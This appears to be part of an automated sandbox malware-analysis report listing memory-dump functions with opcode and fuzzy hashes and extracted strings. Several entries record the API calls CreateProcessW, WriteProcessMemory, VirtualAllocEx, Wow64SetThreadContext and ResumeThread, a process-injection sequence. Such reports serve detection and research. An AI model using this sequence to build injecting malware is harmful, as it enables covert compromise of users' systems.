                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Dtuk
                                        • API String ID: 0-4007847321
                                        • Opcode ID: d9c9522f9a79af12c2c84c27b211518d47876b390899e653b17a701c1b0e812b
                                        • Instruction ID: 09fa6486ed01e29dafaefdb4107e77a84decf44dc6a98bbf623bd7142c068554
                                        • Opcode Fuzzy Hash: d9c9522f9a79af12c2c84c27b211518d47876b390899e653b17a701c1b0e812b
                                        • Instruction Fuzzy Hash: 9923D474A012199FC724DF64D898EE9B3B2FF8A304F1145E9D409AB366DB31AE81CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Dtuk
                                        • API String ID: 0-4007847321
                                        • Opcode ID: d3267bd4719a25aef55f1dbcca98b3ed802dd1368da9b8b3374979e2a7b3f279
                                        • Instruction ID: 165c863dcaf6185268b2f0ee8a70e41ee8bfdb5e85a059eb9399d1441df5d604
                                        • Opcode Fuzzy Hash: d3267bd4719a25aef55f1dbcca98b3ed802dd1368da9b8b3374979e2a7b3f279
                                        • Instruction Fuzzy Hash: BC23C474A112199FC724DF64D898EE9B3B2FF8A304F1145E9E409AB365DB31AE81CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: `!$m$`!$m
                                        • API String ID: 0-4096612506
                                        • Opcode ID: 62ff3e7b4076f4e88c85f5836b33dc3f009056e102ce044789040d23d009c0b9
                                        • Instruction ID: 66d2904c72262fe6419a1dc43dcbe318e4d5df95048de0612b40766b4275f542
                                        • Opcode Fuzzy Hash: 62ff3e7b4076f4e88c85f5836b33dc3f009056e102ce044789040d23d009c0b9
                                        • Instruction Fuzzy Hash: 0481D174E01218CFDB14DFA9D984A9EBBF2FF88300F21846AE819AB355DB305981CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: `!$m
                                        • API String ID: 0-3775330443
                                        • Opcode ID: 4718ff9ca6db6f597d93c49caefeb6a8177891822c063f52665c6ae65f01942a
                                        • Instruction ID: 7f8c9581264f6afccd9fccf8f5ac79f4b446d119d215f32fa012d8a967cf7fef
                                        • Opcode Fuzzy Hash: 4718ff9ca6db6f597d93c49caefeb6a8177891822c063f52665c6ae65f01942a
                                        • Instruction Fuzzy Hash: 65711274E01218CFDB15DFA9D944ADEBBB2BF88300F21816AE419AB365DB345945CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd1a68b1e37a237bd84977c0dc1291728e8202922b8e56a7f1827dc079150ba9
                                        • Instruction ID: 29f76f22d301b644938975b7aa4a0155476cd93b63a1deb4a233376953aaef54
                                        • Opcode Fuzzy Hash: bd1a68b1e37a237bd84977c0dc1291728e8202922b8e56a7f1827dc079150ba9
                                        • Instruction Fuzzy Hash: B5F18B70D1920ADFCB05CFA5D89189EFBB6FF89340B64C45AC446AB659D334A982CFD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d02f96b18cbd1202d2e7cf542ee4fb9549405062785fe09a8c45bcca8a531470
                                        • Instruction ID: 9507f42a920e9eab404773d0715a52258290d79f7f732ecf1d952e2fa92168d4
                                        • Opcode Fuzzy Hash: d02f96b18cbd1202d2e7cf542ee4fb9549405062785fe09a8c45bcca8a531470
                                        • Instruction Fuzzy Hash: 4DD12A70D1520ADFCB04CF95D8818AEFBB6FF89341B60D55AD416AB618D734A982CFD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f71b1ae7910ac1d257d0ac6728d343f3a7d5ecc5b58f8e0410454904c5047851
                                        • Instruction ID: 0beadf4d9372d8b65d2f4187b6cfdc0d51ed489cea8493979687c9ccd6e05229
                                        • Opcode Fuzzy Hash: f71b1ae7910ac1d257d0ac6728d343f3a7d5ecc5b58f8e0410454904c5047851
                                        • Instruction Fuzzy Hash: B8A13874A10248CFCB44DFE8E98499DBBF6FF88301F24C469D419AB629EB349981CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e105a1ba22f09af9e900fe976d501103b5befb768e42f9416d8d2402179c8c79
                                        • Instruction ID: a0f0e30baf7258dba22552df6f48662ffe9665818a20f15bf4739ddf5afbe88c
                                        • Opcode Fuzzy Hash: e105a1ba22f09af9e900fe976d501103b5befb768e42f9416d8d2402179c8c79
                                        • Instruction Fuzzy Hash: 3BA14874A11244CFC744EFE8E984D9DBBF6FF88301B24C469D419AB629EB349980CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e70bcffb32f6b536e439940163369a3275bda8b927873319de32b8948dd31b5
                                        • Instruction ID: 12a65fa49214a8ecf37ffb6d29d5ea7df6facf6d0833fff1624d098e84ebea63
                                        • Opcode Fuzzy Hash: 5e70bcffb32f6b536e439940163369a3275bda8b927873319de32b8948dd31b5
                                        • Instruction Fuzzy Hash: 6FA16874A10648CFCB44DFE8E98499DBBF5FF88311B24C469D416AB729EB349A80CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81e9fbef7386bd680d68d398c88c5546a795c9b7c914329ffa89dc5e7d5f686e
                                        • Instruction ID: 5627aa1f1d1b342832f520a973f0a2099edc11dcf0063e991c1d7422b1a07a36
                                        • Opcode Fuzzy Hash: 81e9fbef7386bd680d68d398c88c5546a795c9b7c914329ffa89dc5e7d5f686e
                                        • Instruction Fuzzy Hash: F1913774A11248CFC744DFE8D98499DBBF6FF88301F24C469D419AB629EB349981CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 827e12c09e7a5479d671e8467a5757ff9819b4d1fce777bd5bbad03bc144a099
                                        • Instruction ID: 67fa00bab24f8d09e352da348cefc684ac369ad637469f363c39f781f31336cc
                                        • Opcode Fuzzy Hash: 827e12c09e7a5479d671e8467a5757ff9819b4d1fce777bd5bbad03bc144a099
                                        • Instruction Fuzzy Hash: 5D81D0B4E002089FDB08CFE9C980A9EBBB6AF88300F24952AD515BB368D7749941CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2f2236cbabbab1e67a311ba1f65a2906f065c64eced8f2b3d8978da351d481e
                                        • Instruction ID: e92a0d77d4fba877489e5b4c14baba80557bd42d1b8f6869f91142a7371567c1
                                        • Opcode Fuzzy Hash: b2f2236cbabbab1e67a311ba1f65a2906f065c64eced8f2b3d8978da351d481e
                                        • Instruction Fuzzy Hash: 2C514870E19608DFCF15CFA5E5806EDFBFABB89310F24A02AD006BB658D73449419B15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a9e8e8c7b313230701d55b07b7e5b026bdd49bedd7eefae1f1c8a92f5aaae42
                                        • Instruction ID: 0424b40d4feb4e8adb0c2cb5bd047ce5d334a12fe1f8447bf1ec22c0ae191790
                                        • Opcode Fuzzy Hash: 1a9e8e8c7b313230701d55b07b7e5b026bdd49bedd7eefae1f1c8a92f5aaae42
                                        • Instruction Fuzzy Hash: AE612771E0022ACBDB24CF65CD44BE9BBB6BF89300F1081EAD109AB654EB705AC0DF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3237f11bc298c05cf70569b74e00d1db61940d5c647ce539e8f2dfcafd54703
                                        • Instruction ID: ad1247c476bd7ab780b1dcd11e2909191f70dcb91deafc6622947d756ad2a31b
                                        • Opcode Fuzzy Hash: d3237f11bc298c05cf70569b74e00d1db61940d5c647ce539e8f2dfcafd54703
                                        • Instruction Fuzzy Hash: 1851F474E052199FCB04CFA9D5809EEFBF2BF89310F28C56AD405A7256C7349A41CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 474f3bed091024010f4b005d768cabe43b3666ca247f4dc3ca6259a8e53b48bc
                                        • Instruction ID: a51dbf25db594207c6cf353e80f62b056c888af03a1bcf843fbee12de7100abf
                                        • Opcode Fuzzy Hash: 474f3bed091024010f4b005d768cabe43b3666ca247f4dc3ca6259a8e53b48bc
                                        • Instruction Fuzzy Hash: 69512671E1162ACBDB68CF65CD44BD9B7B2BF88300F1486EAD509AB654EB705AC1CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6162702705231126859a47bd63829267df2cf9452ed4f148b83cd96f0838064a
                                        • Instruction ID: b9bd76ab88bbd312a2d47bfdf8b8d424c430b18d168a9ac9b247c16ad372282e
                                        • Opcode Fuzzy Hash: 6162702705231126859a47bd63829267df2cf9452ed4f148b83cd96f0838064a
                                        • Instruction Fuzzy Hash: 33310771E046588BDB19CFABD8442DEFBF3AFC9350F14C06AD408AA269DB740A45CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6bdb053e22ef7105fbf5e181bbb8cd750989d8899c54d579c33ab1135ce46d2
                                        • Instruction ID: 1ac6da13066f765fa04900badcbfbae00195c7c8c46dc6c8445f8b2e4d92b784
                                        • Opcode Fuzzy Hash: b6bdb053e22ef7105fbf5e181bbb8cd750989d8899c54d579c33ab1135ce46d2
                                        • Instruction Fuzzy Hash: 2691D074C00269CFCB21CFA5D940BEDBBB5BF09304F1495AAE508B7251DB309A85DF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0036F33C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 3c63a353b4f6e40dc3c83b96a1f8cd8059ccfa4684e513837096dd22b22b5fa9
                                        • Instruction ID: 684e8513546155068f0a2e6ac6bab0d90dd7be592d2a359de2eaedc3598670ce
                                        • Opcode Fuzzy Hash: 3c63a353b4f6e40dc3c83b96a1f8cd8059ccfa4684e513837096dd22b22b5fa9
                                        • Instruction Fuzzy Hash: 3891CF74D00229CFDB61DFA9D940BEEBBB5BF09304F1095AAE508B7250DB309A89DF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0036F9F6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 4c73f06181368e0fc5881825b190e11c8b7a178176c5a053401a31e520a46a91
                                        • Instruction ID: 5b3776d95f8a546806388f126ab59672e7a10b9bd2422f22e4fc1e4b2a5088b7
                                        • Opcode Fuzzy Hash: 4c73f06181368e0fc5881825b190e11c8b7a178176c5a053401a31e520a46a91
                                        • Instruction Fuzzy Hash: 414168B5D002589FCB04CFA9E984ADEFBF5BB49314F24902AE818B7310D375AA45CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0036F795
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a3ee930b13f25c66ef135d6e9f4dfe292384cbfe9d3289ff855287139bb448ea
                                        • Instruction ID: 14dd6de782879b79577e5deb7a811ef2a7b9c2be7ab43800f43160616ccb2c59
                                        • Opcode Fuzzy Hash: a3ee930b13f25c66ef135d6e9f4dfe292384cbfe9d3289ff855287139bb448ea
                                        • Instruction Fuzzy Hash: 304177B9D002589FCF10CFA9E884ADEFBB5BB09310F24A42AE814B7310D375A945CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0036F8B5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: dc034044bf69a4f8d3417425768a10f2ea51b885f115bde53c3cc0ab97cdbed8
                                        • Instruction ID: 5c4152e29509459e0b7781ca9428aa7edd5f38da812540e6ffcb625344ef4e4c
                                        • Opcode Fuzzy Hash: dc034044bf69a4f8d3417425768a10f2ea51b885f115bde53c3cc0ab97cdbed8
                                        • Instruction Fuzzy Hash: 7F3175B9D002589FCF10CFA9E884A9EFBB5BB49314F20A02AE814B7310D335A905CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0036F672
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: f6193407c126d18cb93b153c4268f0a1cc1f8efe5b40db6f6a220a87065c247f
                                        • Instruction ID: dfde1856a57f1786e8bdbb3a38ddf2a65b6166c79ce088713d39437367dbbbac
                                        • Opcode Fuzzy Hash: f6193407c126d18cb93b153c4268f0a1cc1f8efe5b40db6f6a220a87065c247f
                                        • Instruction Fuzzy Hash: 6341A7B4D002189FCB10CFA9E884ADEFBF5BB49314F24902AE418B7310D378AA45CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 0036FBCE
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: df31a0d65b4750e86b64b53575383d21c01950c3cb78136d9df3dd41ead4842c
                                        • Instruction ID: dbe63923707f8dc9b82807cdc6277d16aa9b77824f2b16189aa97d451f2165ba
                                        • Opcode Fuzzy Hash: df31a0d65b4750e86b64b53575383d21c01950c3cb78136d9df3dd41ead4842c
                                        • Instruction Fuzzy Hash: 8B3187B8D002189FCB10CFA9E884ADEFBF4AB49314F24942AE815B7310D375A945CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078752803.000000000015D000.00000040.00000001.sdmp, Offset: 0015D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0abf55e4ba015fb8bf15d7d64a252b6ca599235f08568e9928ebd3d503fbc5b9
                                        • Instruction ID: b6c782633f5e91d16264f37cc09cbc24b744d080598ec3a9180a4cf1537e04cf
                                        • Opcode Fuzzy Hash: 0abf55e4ba015fb8bf15d7d64a252b6ca599235f08568e9928ebd3d503fbc5b9
                                        • Instruction Fuzzy Hash: 9321C275604204EFDB25DF50E9C0B26BBA5FB84319F24C9A9EC094F346C776D84ACB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078752803.000000000015D000.00000040.00000001.sdmp, Offset: 0015D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2edd00774f963654d390e0665525f81a5f230b648357c59ca98c896efe3142e4
                                        • Instruction ID: cfc00d0f7d925b53311e874c800edbf3af9f8052d897917e1f58b3ecf1aecd1e
                                        • Opcode Fuzzy Hash: 2edd00774f963654d390e0665525f81a5f230b648357c59ca98c896efe3142e4
                                        • Instruction Fuzzy Hash: 3521F275604204DFDB24DF10E984B1ABBA5EB84315F34C9A9EC0A4F386C33AD84BCB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078752803.000000000015D000.00000040.00000001.sdmp, Offset: 0015D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a27d43a4c1955039eff67c2422a7a5b7efbd7ab176b06057ede37405d98c4587
                                        • Instruction ID: 11bc33ba5caab934607f5a719d5a19bc01dca3b483bde10286b57ce98516bca5
                                        • Opcode Fuzzy Hash: a27d43a4c1955039eff67c2422a7a5b7efbd7ab176b06057ede37405d98c4587
                                        • Instruction Fuzzy Hash: DF214C75509380CFDB12CF20E994B15BF71EB46314F28C5EAD8498F696C33A980ACB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078752803.000000000015D000.00000040.00000001.sdmp, Offset: 0015D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54b56975082eaa52966f9b1bd15a69ff01385d1c13c46b8dac3802c83270f9d3
                                        • Instruction ID: 6eb3225d1cacb2f23a6ca45851b28a43f5cdcb6c04f111225af8ce9fabc1f8d2
                                        • Opcode Fuzzy Hash: 54b56975082eaa52966f9b1bd15a69ff01385d1c13c46b8dac3802c83270f9d3
                                        • Instruction Fuzzy Hash: 88118B75904280DFDB12CF10E5C4B15BBA1FB84314F28C6ADDC494F656C37AD84ACB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078743071.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 78a74a60489b0be987809189db827e0f28240511e7ad042891e45d653b99fb3a
                                        • Instruction ID: 68eb4bb852c4d4b4817b0a70024bfb7b9501bbfe3fe68b893abfc59c6d02c3f2
                                        • Opcode Fuzzy Hash: 78a74a60489b0be987809189db827e0f28240511e7ad042891e45d653b99fb3a
                                        • Instruction Fuzzy Hash: 4B01DB715043449AEF109B65EC88BA7BFDCDF41B24F18841AED051F392C379D840DAB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078743071.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eae5e81c6b6ba9f2174bfd5ecb296c3504ad4735af8d5d072689c54233a2642d
                                        • Instruction ID: cbe61febbd90fdacad8f18f8a84917403ea22b2a42e981d035a2d5a0588fe726
                                        • Opcode Fuzzy Hash: eae5e81c6b6ba9f2174bfd5ecb296c3504ad4735af8d5d072689c54233a2642d
                                        • Instruction Fuzzy Hash: E9F062715042449FEB108A15DC88B63FFE8EF51724F18C45AED085B392C3789C44CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: m^,$3x
                                        • API String ID: 0-1810126227
                                        • Opcode ID: 74129589303f50eb7ee9635dc0632c35bb0328f4bb185d36002c239c8d84a88c
                                        • Instruction ID: 2110c645d16da05a5e812e1f37084201d556ac723d0343e9a44da0b3a82be321
                                        • Opcode Fuzzy Hash: 74129589303f50eb7ee9635dc0632c35bb0328f4bb185d36002c239c8d84a88c
                                        • Instruction Fuzzy Hash: 1D812674E046198FCB15CFA9C981AAEFBF6BF88304F24C1A9D408A7255D7359A41CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: M'$M'
                                        • API String ID: 0-2930059946
                                        • Opcode ID: 3635b9a011edcd9f4ed49cc56c631caa2838622301758f9de2628ec2af222381
                                        • Instruction ID: 6a5dedde216b52e8786c956396b19f7e0c3806b33906c045ea9eeee4b16f4da9
                                        • Opcode Fuzzy Hash: 3635b9a011edcd9f4ed49cc56c631caa2838622301758f9de2628ec2af222381
                                        • Instruction Fuzzy Hash: 87810F74A15209CFCB04CFA9C98499EFBF2FF89310F64856AD415AB324D734AA46CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: M'$M'
                                        • API String ID: 0-2930059946
                                        • Opcode ID: a22bd0a5a614dfc0bcdafb1be0b93545c5861acd8f8069d758d9b1108b3ebd46
                                        • Instruction ID: 8d8a2be79d5199f6fb231210dad6dea47514ef324be9dbe890cbc158f5338cd6
                                        • Opcode Fuzzy Hash: a22bd0a5a614dfc0bcdafb1be0b93545c5861acd8f8069d758d9b1108b3ebd46
                                        • Instruction Fuzzy Hash: 07810074A14209CFCB05CFA8C58499EFBF2FF89310F6485AAD415AB324D734AA46CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: m^,$3x
                                        • API String ID: 0-1810126227
                                        • Opcode ID: e7eb502c9e0db7b2e11558b4d637d2fd2593278904dfe65a59c6f42ce2edde55
                                        • Instruction ID: bf77ae3963335aa58d6d8756a1dd9f592dae3cf1805294828dce78de46cc96bb
                                        • Opcode Fuzzy Hash: e7eb502c9e0db7b2e11558b4d637d2fd2593278904dfe65a59c6f42ce2edde55
                                        • Instruction Fuzzy Hash: 1A710974E106198FCB15CFA9C981AAEFBF6BF88304F24C1A9D408A7355D7359A41CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: b6T
                                        • API String ID: 0-2928609528
                                        • Opcode ID: 6ba2d1bee539ce6c7958beda346d966073bc66cf4b9fa76523f952d1d67a69e4
                                        • Instruction ID: bcd62d866540b88c4bc8b612796ede8bede2494ebeb81ea0a69ea1f8ea569e0e
                                        • Opcode Fuzzy Hash: 6ba2d1bee539ce6c7958beda346d966073bc66cf4b9fa76523f952d1d67a69e4
                                        • Instruction Fuzzy Hash: FA814974E0520ACFCB05DFA6D5814AEFBB2EF89300F64D42AD015FB628E7749A018F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: lPf
                                        • API String ID: 0-1962453515
                                        • Opcode ID: 538143f6f26ac2a147ca4d758c1223fd3c3285215e249c42560f8b75b082a2bd
                                        • Instruction ID: 9f0fd4cd6877d32fb2cef406251d0922b8d217e13a43edfc75b2b67836b19eb0
                                        • Opcode Fuzzy Hash: 538143f6f26ac2a147ca4d758c1223fd3c3285215e249c42560f8b75b082a2bd
                                        • Instruction Fuzzy Hash: 8B512A74E1520ADFCB05CFA6C5815AEFBF6FF88300F24D46AC506B7218D7349A429BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: lPf
                                        • API String ID: 0-1962453515
                                        • Opcode ID: 225146212ded3cd9cc4e09c51f6c84facc8eb49e73480e668669422a1e0513b0
                                        • Instruction ID: 852cb9b8745da4440fdb914c4267938ee4d647a55002cf75fd12c37187f1c62d
                                        • Opcode Fuzzy Hash: 225146212ded3cd9cc4e09c51f6c84facc8eb49e73480e668669422a1e0513b0
                                        • Instruction Fuzzy Hash: 46510C74E1520ADFCB05CFAAC5815AEFBFAFF88300F24D46AC505B7218D7349A429B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: 0a3f8a8075f9cf491362137486371711bee5727fde9fc7fdf5a7403041cd844d
                                        • Instruction ID: 55588524c5257873f73f9adf1f10c0f54794cc3ca1a19c13ebfb0628c9ce6b80
                                        • Opcode Fuzzy Hash: 0a3f8a8075f9cf491362137486371711bee5727fde9fc7fdf5a7403041cd844d
                                        • Instruction Fuzzy Hash: 9C21DE71E056188FEB19CFABD84069EFAF7AFC9200F18C07AC808B6224E73445558E51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: h4"
                                        • API String ID: 0-64039421
                                        • Opcode ID: 053554343a6149179107f03efca44e4f1651ded2742ec8c24eca3e93846ccb51
                                        • Instruction ID: d3ce6aafc93e266b44b49d1c7da7de0933d7b5f0002a27bbd00487eb71c1e288
                                        • Opcode Fuzzy Hash: 053554343a6149179107f03efca44e4f1651ded2742ec8c24eca3e93846ccb51
                                        • Instruction Fuzzy Hash: 4C11CC71E016188BEB18CFABD94069EFBF7AFC8200F18C07AC518A6268DB3456558F51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63e46c0f55468b660bca08126aaf34b5554abeab3f741d4727bd9c4c9d7835e5
                                        • Instruction ID: b3a4fb6a33b2dc57efe5e7b670d53803086ce3cb7513fd65db668626aa5adad2
                                        • Opcode Fuzzy Hash: 63e46c0f55468b660bca08126aaf34b5554abeab3f741d4727bd9c4c9d7835e5
